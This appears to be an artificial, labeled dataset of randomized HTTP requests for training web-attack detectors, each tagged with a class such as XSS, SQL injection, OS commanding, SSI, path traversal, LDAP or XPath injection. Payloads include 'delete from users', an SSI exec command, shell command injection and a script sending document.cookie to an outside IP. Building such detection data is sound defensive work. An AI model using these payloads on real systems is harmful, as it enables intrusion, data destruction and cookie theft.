PUT /se9deeaonn29jrEpTht/iXh-eRmn@Her/aOzS1Pt/tyCfNlPz7odImZx/ji9qgmZ/oascbosgIehvna/hqfXODvVfls96/ugwFfD.5wqsF7mc/sEJYdBg4zq-8w/hA.KyO4FrL/xoPhutfer1V6e.tiff? HTTP/1.0
Content-Length: 62
Content-Language: e,e,t
Content-Encoding: gzip
Content-Location: /rlnHssdG.gif
Content-MD5: dHB0ZmllOGhtb2VmdGVraA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 25 Apr 04 03:04:18 GMT
Last-Modified: Fri, 07 Jul 06 05:59:18 GMT
Host: 89.7.131.50
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: skiL7h-dIsgC
Cache-Control: max-age=45208
Client-ip: 240.32.159.203
Cookie: 83riEen=e objectx5imretni;5Qiframef4DjOm=ch1h;ede=nLrK;t7vles0trxn72=ulN@jaQwMbDH
Cookie2: $Version="86"
Date: Wed, 05 Jan 05 03:31:13 UTC
ETag: W/"531dopOQUGTzEYYmsZ"
Expect: s2C5
From: usoekn@3fnpm.it
If-Modified-Since: Tue, 05 Jan 10 14:35:06 GMT
If-Unmodified-Since: Wed, 17 Oct 07 03:28:46 CET
If-Match: "0O28l0PxkqucuFPD"
If-None-Match: *
If-Range: Tue, 02 Nov 04 11:28:00 CET
Max-Forwards: 4009
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Basic cnNlaW9yOjFzc2U=
Authorization: Digest algorithm=MD5
Range: -4,-09852,71-
Referer: http://www.tfy4We.ch/aounaehc/o1eewnT/3soE/dwasEt/nfa4uj.zip
TE: trailers,trailers,chunked;q=0.3
Trailer: If-Unmodified-Since
User-Agent: Mozilla/4.2 (X11; U; Linux i386 3.1; rO-oc; rv:7.4.6) Gecko/45830564
UA-Disp: 631,569,16
UA-Color: color8
UA-Pixels: 466x9263
Via: FTP/4.0 102.30.170.153:3838, 3.4 www.OQnl.shtml
Transfer-Encoding: compress
Upgrade: erE/1.2, jEaa/5.4, tqau/4.0
Warning: 774 www.u1nAt.tiff:5 "nuNymcpsqnfp7abDt" 
X-Serial-Number: 2274804334681
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

6e=941644&8CeeyevCss=<!--#echo var="date_gmt"-->

End - Id: 39187
Start - Id: 48884
class: XPathInjection
GET /kK/QclsSROv/gOkiFUDx7P3/D6PoUotDtg8Anw1eoei/i1Lw2jtOso.asmx?NTzA=470&nifchrTroelzt=zvexec-nc&nbe0a=ufrC6uiZsfZf&hmywiu=uhlts%27+++or++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++++or++%27eloyNke%27%3D+%27 HTTP/1.0
Host: www.nbneb.uk
Connection: keep-alive
Accept: */*
Accept-Charset: cp-950;q=0.4, cp-936;q=0.9, us-ascii;q=0.0, iso-8859-1
Accept-Encoding: compress, deflate;q=0.8
Accept-Language: *;q=0.5
Cache-Control: nIty='9'
Client-ip: 220.116.206.243
Cookie: bit8zpiedc=98959;ecGg2tycrE=434460318
Cookie2: $Version="409"
Date: Wed, 23 Jun 04 21:03:12 UTC
ETag: "62GK_7jLYsp@BqfFlhae"
Expect: 5iusOoAi
From: nhrer@c9ndnn.gov
If-Modified-Since: Mon, 18 Aug 08 16:01:49 GMT
If-Unmodified-Since: Thu, 12 Jun 08 13:29:51 CET
If-Match: *
If-None-Match: "xZBam07P2VwFIbTCYU"
If-Range: Sun, 27 Sep 09 23:27:54 CET
Max-Forwards: 896
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: dyscrl o8iQnhe=rsca
Authorization: Digest nonce
Range: 41-,-69
Referer: http://www.c2ri6etA.net/nmosvtE/iunselct/Dirp.zip
TE: gzip,trailers,deflate
Trailer: Max-Forwards
User-Agent: foesto (qp72WiaSN; b3S1wge-E; hHwRv7BLu)
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 1420x8323
Via: HTTP/5.6 28.237.93.34
Transfer-Encoding: gzip
Upgrade: wagnk/0.9, aebao/4.3, 7ip/5.1, ttd/1.5, iI1eI/9.7
Warning: 737 218.64.14.144 "btkeCbiitsnonn" "Tue, 09 Aug 05 16:53:24 CET"
X-Forwarded-For: 89.218.173.144
X-Serial-Number: 3294435
----: ------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 48884
Start - Id: 48009
class: XSS
GET /xXSOC9-YJacceptzlink/bse51eei/drvTStt6l/ey/OMFPw4@Pcmd.php?7nahe1xime=jrsaikmletj3E2ieeH&0jM3xp_PRRb7=%26%7B%5Balert%28%27sn%27%29%3B%5D%7D%3B&vNj4kinsertjeDDLg=aal1%3Cddf%404&aoa=aa&0-7yJoD=oSO7BC2I&lasnai6=8&Qcsocwltmil=5hof%2F3tahy5E&X2HNxmtmpunionN=%25m%40sol+https%3Ewumnwp-oa%24&ie3yuvzesdn=412 HTTP/1.0
Host: www.sygsd9aoyu.uk:83747
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: bdy-emw
Cache-Control: only-if-cached
Client-ip: 192.143.189.93
Cookie: 2oaai=imniostnsem;dZho=61818406;oOeootRo=5yi0hxmlsmceo)n7; n;6p1qaLel=234;kmTfd=&Ep
Cookie2: $Version="40"
Date: Wed, 28 Apr 10 15:33:26 CET
ETag: "wpRitPdByMlsrTEbXjXz"
Expect: 100-continue
From: n25cwrN@ae4ttib.uk
If-Modified-Since: Fri, 19 Sep 08 05:30:21 UTC
If-Unmodified-Since: Sat, 03 Mar 07 01:48:45 CET
If-Match: "uuuqI1XwtYZUwjgo"
If-None-Match: *
If-Range: "GfDk.aHG6n7hj0ZvNwLj"
Max-Forwards: 017
MIME-Version: 8.3
Pragma: n8rue5e=rkie
Proxy-Authorization: NTLM NnJhc2lkbGhldzBvZWFkcDRlYW5zdWVuaWF0c0xuaGdnZXBob28=
Authorization: Basic dG9vdTpzSHRuZ2U=
Range: 545-32,248-,104203-4203
Referer: /umhrmcns/ysiTniee.swf
TE: trailers,deflate;q=0.2,trailers
Trailer: User-Agent
User-Agent: Mozilla/1.8 (Machintosh; U; PPC 8.8; ie-sp; rv:3.4.7) Gecko/58087799
UA-CPU: PowerPC
UA-Disp: 212,5646,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9754x5278
Via: 4.1 www.tHyoonno.shtml:128, 0.9 www.stTtfns.shtml
Transfer-Encoding: identity
Upgrade: mtenw/7.3, ootl0/6.0, ncmojI/8.6
Warning: 867 196.240.170.127 "obax" "Mon, 11 Jul 05 01:16:42 UTC"
X-Forwarded-For: 186.104.154.65
X-Serial-Number: 698729021
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48009
Start - Id: 49368
class: XPathInjection
GET /ftko/gdFcselectRdk0jsock_stream1.js?uJRK2OKezZE=%28i+%3C++count%28v7ntd%2Fchild%3A%3Atext%28%29%29+++++and+++++j+++++%3C+++++count%28u2s%2Fchild%3A%3Acomment%28%29%29++and++++k+++++%3C++count%28LeEwe%2Fchild%3A%3A*%29++++%29&uTzcLJW=d+%26%256gta2aiunnels HTTP/1.1
Host: www.Adabd.fr:74084
Connection: close
Accept: audio/*, audio/x-wav;q=0.9, application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: otnr-l;q=0.1, asglnz-Zlfe
Cache-Control: no-store
Client-ip: 204.180.12.252
Cookie: SM=3360887;5yUaea=A;nodythf=75;binputjUPzHR=iabhwexeceabgo;rnyrc3twbs=788
Cookie2: $Version="846"
Date: Wed, 04 May 05 21:23:58 GMT
ETag: "gRqaxicCjKmiIeMRRJ"
Expect: Tuxyl=nqqhaaen;tyEptn=rc4e
From: deodan@edhI.net
If-Modified-Since: Sun, 28 Aug 05 09:49:31 UTC
If-Unmodified-Since: Sun, 22 Aug 04 17:23:31 UTC
If-Match: *
If-None-Match: *
If-Range: "qIXiOEH1Or1mVYrI"
Max-Forwards: 5431
MIME-Version: 7.0
Pragma: jgosdoiC=pe7rd
Proxy-Authorization: Digest uri=http://efar.be/thtuh/euhhew3a/theOa.conf
Authorization: Digest response="B78BfCe2EEBf82B7C940d290C7C9afAB"
Range: -9178,535260-09009
Referer: http://6iet5n.gov/u8saisEd/esEjTvic/otci/k9ns/ssfo6naw.rar
TE: chunked;q=0.5
Trailer: Pragma
User-Agent: Mozilla/9.1 (X11; U; Linux i386 1.1; an-h9; rv:0.5.7) Gecko/04287533
UA-CPU: StrongARM
UA-Disp: 646,996,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 3843x971
Via: 0.2 www.BrELlent.shtml, HTTP/9.2 www.euopqaer.js:5, 0.8 183.22.176.39
Transfer-Encoding: compress
Upgrade: fdzt6r/1.6, f4eN8/7.9
Warning: 136 11.147.101.120:8 "azxwWdgjetsnwgt6ecfc" "Sun, 05 Nov 06 18:36:55 GMT"
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 68426632486242488
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49368
Start - Id: 36786
class: OsCommanding
GET /s1r2aiessbew/uY/84ntAee/aaEeh0qeh5rr2sctt/Yy/wLj@ZOU8Yw68/8R45ugPBgvJBjWfxC_j/JygJq/darS/8ed/ihuRad2oinw5oe5Eid.nsf?twEt=etoinputC&oghmirtecin1s=HEoiaroto&urcpxIALj-=ssu9aKoiabmaerEm2h&saey1ioTbrTx=jfroma3&esuf1t=563032676&sit6n=4Exml6ef&mfhhyt=ixidshutdownnm&rcVQz_1oZq4=%7C++echo++%22+++++Content-Type%3A+text%2Fhtml%22+%3B+echo++%22%22++++%3B+id%5C0 HTTP/1.1
Host: 129.125.67.114
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: koi8
Accept-Encoding: 
Accept-Language: 3adig-in7is, xhluenum-atsieait, ioay-xdu9n6, oeiUn9h-e, te-cez
Cache-Control: no-cache
Client-ip: 183.149.193.186
Cookie: pis4bedhoa=eezeonihhtaccesO;di=loegtu)Cre|n;noeOw=853;yecLrE=eqr
Cookie2: $Version="538"
Date: Fri, 19 Nov 04 23:12:37 GMT
ETag: W/"WNaw5RqhVgLPmf0nz7aY"
Expect: laege7
From: RdaleTeo@igeTtd.be
If-Modified-Since: Thu, 04 Jan 07 20:34:39 GMT
If-Unmodified-Since: Wed, 20 May 09 10:06:39 UTC
If-Match: *
If-None-Match: "5tXW7h-y4n-EPYhqo."
If-Range: "yb-DI510qaPi.D_Vz"
Max-Forwards: 44
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: NTLM NWl0Y25pb3Jha096ZWhmZXBzbmxoZW1LbTdlb25zaDJDdDVubnRib3RuaHNlZg==
Authorization: citeml sTeoegdo=Daea
Range: 907-5,-807
Referer: /sspnapn/Oaobl/eqzu/chdk.gif
TE: trailers,gzip;q=0.4
Trailer: If-None-Match
User-Agent: 1_n-uo5ERY http://www.3itteFr.biz
UA-CPU: PowerPC
UA-Disp: 9579,9287,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 232x1783
Via: FTP/6.5 www.elie.jpg, HTTP/5.8 www.tmtoh.png, 5.2 www.ucbhroj.png
Transfer-Encoding: gzip
Upgrade: lNc/6.5, 7nli6/7.0
Warning: 133 www.UaEc.shtml:24599 "tmgftooT" 
X-Forwarded-For: 5.176.183.129
X-Serial-Number: 51873709956197
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36786
Start - Id: 47678
class: XSS
GET /zCHxmlUd/oDt/erejleeWJtrlwryiwTm/h_AF2I9qhydSDCV9fo/7ftpTO0CJ/eaHyS7ani8cf/ovrtnmdithre/@Yx8V@iframeEhavingRshutdownkFP0/aGbpswAskDYmGtTN/9uAgbYUzW/45anI.gif?aznoooYoetHIi=IXtomnswenharii&0ibse4=naooN1i5amht&n4oefciuse=7665&baa=47977763&fheuenseNa4yfle=Iwinntrcmochahtpass&f3gYaZstdinoxxterm=Whja+&egkelbssqis=%3Cstyle+++%3E%3C%21--%3C%2Fstyle+%3E%3Cscript++++%3E%5Balert%28%279lme%27%29%3B%5D%2F%2F--%3E%3C%2Fscript++%3E&2ts=050892&grnspcyRneg=ewi9 HTTP/1.1
Host: 138.21.116.37
Connection: close
Accept: audio/basic, application/rtf
Accept-Charset: euc-kr;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 66.135.63.45
Cookie: eyynea6asa=csrtiees
Cookie2: $Version="699"
Date: Mon, 07 Feb 05 03:28:55 CET
ETag: W/"B5.amP4RFDQ0Wn0"
Expect: 100-continue
From: 25osyn@hmnsy.org
If-Modified-Since: Sun, 16 Apr 06 24:27:24 CET
If-Unmodified-Since: Wed, 16 Feb 05 08:40:46 CET
If-Match: "C1nWSvohfN1fmR4Gc"
If-None-Match: *
If-Range: Mon, 23 Apr 07 04:49:35 CET
Max-Forwards: 627
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: nemanc ahnau=ondhpsao
Range: 06140-26429
Referer: /seamT1/2BSooo/r3refcn/paadeci/ioyetNCn.tar
TE: gzip,gzip,deflate
Trailer: From
User-Agent: onscjnh (eAj2xaN1wG; hhytlJM)
UA-CPU: 68000
UA-Disp: 8471,6615,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 934x7117
Via: zoes/3.0 235.135.82.75
Transfer-Encoding: identity
Upgrade: OceeiE/8.8, btin/1.3, wrUw/4.8, toehd/0.2, t0m4l/5.1
Warning: 797 10.182.112.205:62 "mparhiqesWqMnqIet2" 
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 6943669939
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47678
Start - Id: 44880
class: PathTransversal
GET /kbilenttOeseo/VzqlinkwvZOeacceptEX3/qchk/03neai/isn2p3DHEqCRow3b/cy.KeVB75/Ainap/oJ2tSH@KU3SEYk/niOeedascaSLusdtrn/iUd0/s73dThs6tacgthmdtlkh.mspx?mrm6SiIelt=5%7CleB&fot=4&Af40PbfDK=oxtjrgyo8Wory0&esoi=%2F.%2F..%2F..%2F..%2F.%2F..%2F..%2F.%2F..%2F..%2F.%2F..%2F..%2F..%2F&j2Fnnrdie=s+es&ste=aM6F0NMrTEE4&tnrrSoynrtIbMc=9236 HTTP/1.1
Host: 167.90.228.156:80
Connection: close
Accept: text/xml, text/*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=61467
Client-ip: 32.25.74.7
Cookie: yIj7ze=t
Cookie2: $Version="7"
Date: Mon, 23 Aug 04 02:17:44 CET
ETag: "WSiicknjLTWpwfKBAa"
Expect: 100-continue
From: reecos@eeesftcx.gov
If-Modified-Since: Wed, 14 May 08 11:04:27 GMT
If-Unmodified-Since: Mon, 01 Aug 05 14:41:59 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 02 May 09 01:31:03 CET
Max-Forwards: 3
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: NTLM Ym1ocEh3ZWVjZ3NzNmxnenRzbGhzbXRhaXBlTjZvZWFhZXRlYQ==
Authorization: NTLM b2xuYXRlMm9FZWVvZWdya3lyZWkycGFJZnJucmV0OGY0YXJuZmI1dHZ0ZXNk
Range: -41,56231-,-8575
Referer: http://www.4oda9rE.gov/xgixtt/wchhpDt/aisssm.mdb
TE: gzip,trailers,trailers
Trailer: TE
User-Agent: Mozilla/7.1 (compatible; MSIE 3.7; Win98; dept; vgexboxec)
UA-CPU: 68000
UA-Disp: 229,303,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 134x0521
Via: HTTP/6.5 www.nikaStl.htm, 3.9 57.191.67.7:59
Transfer-Encoding: gzip
Upgrade: a04E/0.2, dOen6p/3.6
Warning: 919 218.70.108.162 "ndpaastlweaihe5" "Thu, 07 Apr 05 15:20:50 UTC"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 279429
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44880
Start - Id: 49801
class: XPathInjection
GET /nvbscript7rBaeF/8btnqheoabohodtte.dll?nc=383884&lDGetoPn3n=j%5D7it&homeT6oQSLBrm=6u-eVw&csooeio9fq5cPq=94529+++++or+++++1%3C+++++Qhi%2Fw%2Fiad%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D433%5D+++or+++++59927%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27 HTTP/1.1
Host: www.sttxIor.uk
Connection: keep-alive
Accept: audio/*, text/*
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: saoeCq4-eA;q=0.7, isha-ee, rdibr-t;q=0.8, eCh9-E
Cache-Control: no-transform
Client-ip: 41.236.97.233
Cookie: or81nl=onictkchjaysetf2rt;dnIlrev=4686759367
Cookie2: $Version="71"
Date: Wed, 22 Oct 08 20:06:35 UTC
ETag: "G2lvDzt3GUzDs0U4"
Expect: 100-continue
From: phhnt6fe@hiNse23A.fr
If-Modified-Since: Fri, 31 Aug 07 10:15:36 CET
If-Unmodified-Since: Sun, 05 Nov 06 15:18:36 GMT
If-Match: *
If-None-Match: "pGRGra8HOg7T2Qr2"
If-Range: Mon, 03 Jan 05 22:40:52 CET
Max-Forwards: 6803
MIME-Version: 1.9
Pragma: semyhzhs='smdtl'
Proxy-Authorization: Digest nonce
Authorization: Digest nonce
Range: 1-,586-,-3399
Referer: /nafsitF/klnlqc.php4
TE: deflate,deflate,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/3.2 (Machintosh; U; PPC Mac OS X 1.4; is-hf; rv:3.4.1) Gecko/74146870
UA-CPU: x86
UA-Disp: 662,518,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 172x6984
Via: coiw/4.4 117.47.202.149, 4.4 32.48.92.239, 2.4 226.113.93.253:8
Transfer-Encoding: deflate
Upgrade: oticr3/9.7
Warning: 295 41.145.9.69 "ali9sAg6ha" 
X-Forwarded-For: 153.197.11.133
X-Serial-Number: 09611302404410791541
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49801
Start - Id: 48564
class: XPathInjection
PUT /sHz/5@8Z@3libwget-Un.html? HTTP/1.0
Content-Length: 396
Content-Language: C,sswn2etr,ei1
Content-Encoding: identity
Content-Location: http://www.tOsut.be/wTfe/luaYfd/eomvedt6/tsogat/6ehaym3.mpeg
Content-MD5: dG81bnFyYWFzYWlldXc2aA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 09 Oct 08 18:11:54 UTC
Last-Modified: Sun, 22 May 05 04:47:32 GMT
Host: www.eyOrido.gov
Connection: ala6iM
Accept: image/*;q=0.9
Accept-Charset: iso-2022-kr;q=0.0, iso-8859-3;q=0.9, x-mac-greek;q=0.0, iso-10646-ucs-2;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 174.93.187.45
Cookie: 5UnullA02BshutdownWvvarW=1Rm;5e=86seiafr5e(aZt;7EKvxHRSuI=dEto-a5dtaat du
Cookie2: $Version="98"
Date: Wed, 03 Aug 05 03:02:30 CET
ETag: W/".NpEoPMJ922d-Z-plN"
Expect: olaslnwd=eMwneuh;iodg7=mroae
From: w3nw@eoeld2.be
If-Modified-Since: Tue, 04 Aug 09 05:48:08 GMT
If-Unmodified-Since: Sun, 07 May 06 01:57:00 CET
If-Match: "Z6c43SIzfP2qH58GinIm"
If-None-Match: "uR5RYQlVWfXpJdk"
If-Range: Fri, 29 Aug 08 11:27:38 CET
Max-Forwards: 0627
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: siue bdclebse=ssaui
Authorization: Basic YUVzSTdvOmdlc2lzRW1h
Range: -99
Referer: /dROs/whsbaKit/3iih/bwloyis/sqxxsect.aspx
TE: chunked;q=0.7
Trailer: Authorization
User-Agent: Mozilla/8.5 (X11; U; Open BSD i586 4.1; 1L-ea; rv:7.3.3) Gecko/03860343
UA-CPU: StrongARM
UA-Disp: 488,4156,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 0026x0337
Via: 7.9 www.erot.png
Transfer-Encoding: nhRze
Upgrade: tht3/1.7, Wquod/3.6, gppbhH/7.6, oiu/0.5
Warning: 651 www.filmtc.css "8HFtmshdumhqpyai" 
X-Forwarded-For: 60.213.229.203
X-Serial-Number: 63432598525498098
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

cte=1logt&uselectsQ=9&VU4xml=ohefp&gKAstdinXR5y-CbgsoundT=@&sH5sspu=02013&o3dsleysaetc=mbHF7JZr&qvinSt8L=9   or  count(path/child::node()[position()=((i+j+k+l+1)]     | path/child::*()[position()=(k+1)])=1    or 2876=&de2Dchpeyclcns=qo psd)z&pngsktsargo=3309672&sShopi=jeeyw&ui=a4TKSB6iWmE&pgiy=09&hx=360557&bpanooitcy=hZ2

End - Id: 48564
Start - Id: 40347
class: SSI
POST /tdifeeoreotdEeigou/yMGVHp1_ZcaXAzZjR@BF/r8RgNChWMkjW3/jOoudb6stvm543usrs/hhta4ab7/wsiIagetssb6fds4sg/ewORl50ee/ptArhedenne5lifcofJ/ohMvcGcl/tcE6m616CyyC.tiff? HTTP/1.0
Content-Length: 248
Content-Language: b,jsthidr,niBdes0x
Content-Encoding: identity
Content-Location: /afstaE/ArGostag/i58ke4/tftail.asp
Content-MD5: Z2VnQUlzbmVlckVlbGVQeg==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Sat, 29 May 04 11:43:33 GMT
Host: 24.199.241.160:02
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-15
Accept-Encoding: <!--   #exec    cmd="c:\progra~1\mr4\oioops\sn.exe     d:\tyr0U\www.ntreaste.org\sidoeEio\database.mdb   /x exporttofoxpro"-->
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 167.66.69.211
Cookie: ro4qlpt=iVYc.;aened=ROnlkr6eou2Ncae;jeettAfst=sopt3t;stn=fhhhixnp;fsoaean=73468018;earhGlnw6iVg=6359
Cookie2: $Version="25"
Date: Sat, 24 May 08 17:11:48 UTC
ETag: W/"@diTZVX_-jsYYUgamK"
If-Modified-Since: Thu, 19 Feb 09 24:44:11 GMT
If-Unmodified-Since: Fri, 04 Jan 08 16:05:37 UTC
If-Match: "La-n5z0SiiHdNd1R"
If-None-Match: *
If-Range: Sun, 16 Aug 09 10:37:11 CET
Pragma: seqaeiw=tpat
Proxy-Authorization: Basic aE9qUHN0OjVhNnk=
Authorization: gh0zrl inaohe=ryg8si
Referer: http://www.ekE9.ch/y95vhpu/e0gl/evgea/iTqLf.jsp
TE: trailers
User-Agent: Mozilla/1.5 (compatible; aierdlO9la; Windows NT; hersguEb; aeye8EsHoo; emmpmEdehr)
UA-Color: color16
Via: 6.7 221.198.21.86

me=943855447&7ecoiPnksig=tNeXxPv6V&saEnwqemidae=bakQDa&uiy9deahsrvn9o=83&iedf=ei&sucdbsiywsa=Nshi&nai8zjhtbsi=p4ehooC\n0odbe&sardmbb4d8=Tr+ljghe(oz&rtastp2ee=lFer&dneauev=eexie&peothnfeCdrnOo=boot.ini'tt&oAgl2wefeiwg2=r&romt=n um0;n>ryr

End - Id: 40347
Start - Id: 41753
class: SqlInjection
GET /qQ/e5n7wce8enehmdsS/55esEicdnsOLsirlcxhi/m8aerhOb7a.pl?txEmmqze6seelaf=%27%29%3B+++++delete+++++from+++users%3B+commit%3B++dummy%28++++%27 HTTP/1.0
Host: 8.236.189.4
Connection: keep-alive
Accept: application/*;q=0.1
Accept-Charset: x-mac-turkish;q=0.1, euc-kr;q=0.1, iso-8859-9;q=0.2, koi8;q=0.4, utf-7
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 122.67.58.101
Cookie: Angr62iado=tta;i4heotit7Eaua=244287;7riilaah=ybdenii 8uost;eaon=eQsv7rJ3is;cer1u4oemearals=t8l
Cookie2: $Version="2"
Date: Tue, 06 Apr 04 01:29:01 GMT
ETag: "4K2mazPqrLOm65B"
Expect: crar=tsunz
From: lehFo@eioiwni.cz
If-Modified-Since: Sun, 27 Jan 08 13:17:56 UTC
If-Unmodified-Since: Mon, 04 Jan 10 18:15:48 GMT
If-Match: *
If-None-Match: "bZkSgga4XYE2Gs59"
If-Range: *
Max-Forwards: 0
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: Basic cGI2bXI6c2l0eHNubVM=
Authorization: Digest nc=89A0C5E0
Range: -69404,-1
Referer: http://tnon.be/eoxAzb/oqyG/clveis/gordlD/i7iEia.png
TE: trailers,gzip;q=0.1
Trailer: Cache-Control
User-Agent: Mozilla/0.9 (compatible; MSIE 6.6; Mac OS X; iretein)
UA-CPU: 68000
UA-Disp: 570,952,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 8272x964
Via: 5.9 16.93.178.197, eso/9.0 www.Esumys.gif:9, HTTP/1.2 www.royio0.html
Transfer-Encoding: compress
Upgrade: nrm/7.6, ee0ei/0.3
Warning: 709 www.r6wrni3s.jpg "mspeoetalDMtssrEec" "Wed, 02 Nov 05 08:37:49 CET"
X-Forwarded-For: 140.12.238.50
X-Serial-Number: 81915611891
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41753
Start - Id: 38515
class: LdapInjection
GET /rsnb6age/timdtraut7ststa/abkeswp3anh/qjPTl__openC/ic0rqELat/tqfScXS3GyFMkfFM.swf?srbtchslsmle=iGWwPA6e&YRIP@@vc=%29%28+++%7C+%28hewot%3DtueE*%29 HTTP/1.0
Host: www.to9i.ch
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: iso-8859-6, ks_c_5601-1987
Accept-Encoding: *;q=0.2
Accept-Language: me1dsdxt-ab;q=0.7, nasou-wdivro;q=0.2, saoeQj-Fne
Cache-Control: min-fresh=888
Client-ip: 54.57.173.108
Cookie: uoo0i71hpn8=8gnd4oL;edjsgnrep=0;zt0nqa81dcmerm= em0;in=t@;roahsoaouN1Bbb=1ngoa4n;sskluooeysei=is;iten6moaxe T
Cookie2: $Version="2"
Date: Mon, 24 Aug 09 02:13:12 UTC
ETag: W/"6cabhDopjWR86jSj8-"
Expect: lsfu4ai=3wee;e2mko=metMe
From: lscomkd@ophedlorn.cz
If-Modified-Since: Sat, 17 Oct 09 17:34:26 UTC
If-Unmodified-Since: Sun, 11 Jan 04 22:21:53 UTC
If-Match: "cca5.6ISIkjdZr8kIR"
If-None-Match: "OjODF.LDmgJ1crs"
If-Range: Mon, 15 Sep 08 18:12:11 CET
Max-Forwards: 121
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Digest response="Fd6C0B3D3bd244b0cA2F85cC8f1AA3cb"
Authorization: NTLM OWhYczduY291cmthT2hTa3JvM3NoZW5vZVlycmtkdU9lZ3JlYWVxbm52
Range: -087,245-62681,-648438
Referer: /noezce.asp
TE: gzip,deflate,trailers
Trailer: Warning
User-Agent: Mozilla/6.9 (compatible; eamjae; Solaris; aTalotat)
UA-CPU: 68000
UA-Disp: 8582,573,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 877x552
Via: FTP/7.9 www.nteeeeti.css, 0.8 142.66.45.74, HTTP/4.2 232.117.232.48:44151
Transfer-Encoding: ehiyol; lsna=jfcsaoq1
Upgrade: liDg/6.9, m3r2/7.5
Warning: 474 3.199.185.32 "psgyu2iuh9p6t" "Wed, 30 Jul 08 06:32:37 UTC"
X-Forwarded-For: 77.77.248.41
X-Serial-Number: 30599
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38515
Start - Id: 46632
class: XSS
GET /dmCa/mimjQemrcgPQ@gQOz/kwsbo/cMlx/aoai/stbg/7B/onaoRRs.jpg?eieuyEsnSihvlbz=tfu9TkzOWC4&ha=nnatkitoTetlwyu&r7U3PO=m HTTP/1.0
Host: www.kEs4i.ch
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: <meta  http-equiv   =  "    refresh   "     content    = "   0;url=javascript:    [window.open('http://126.33.221.169/ll.nsf'+document.cookie);]     " >
Cache-Control: no-transform
Client-ip: 219.150.217.95
Cookie: dect=rVMYTz;j1home7v4MmVtB=sf0h;ueiiTFcrOe=window.opentbin;hd=)ucopytt;cre=78708;l9hkkovrip=e6c e  -
Cookie2: $Version="5"
Date: Wed, 10 Jan 07 21:07:29 GMT
ETag: "14UmgyVJx4Sug6vrUA4w"
Expect: vetise=ab4eliOb
From: iuaea@cvOyle.it
If-Modified-Since: Mon, 12 Dec 05 02:31:07 UTC
If-Unmodified-Since: Wed, 15 Nov 06 22:43:45 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6540
MIME-Version: 2.9
Pragma: anR=nde2tn
Proxy-Authorization: NTLM c2hkbDNhbmRhMGVJbGluUmN3MW9zM2VlbFdleHFpZWhBbmFzaURmOW1tZG8xeg==
Authorization: Digest username="rcen9sq"
Range: 516737-,3-
Referer: http://iyant.cz/ten2rlm/pfd8fd/Qrofea5/selEewfh.mpeg
TE: trailers,trailers
Trailer: Via
User-Agent: agoOhq5sr0ttgqzaj
UA-Pixels: 488x452
Via: 6.5 www.efei9art.tiff
Transfer-Encoding: identity
Upgrade: Ecza/9.5
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

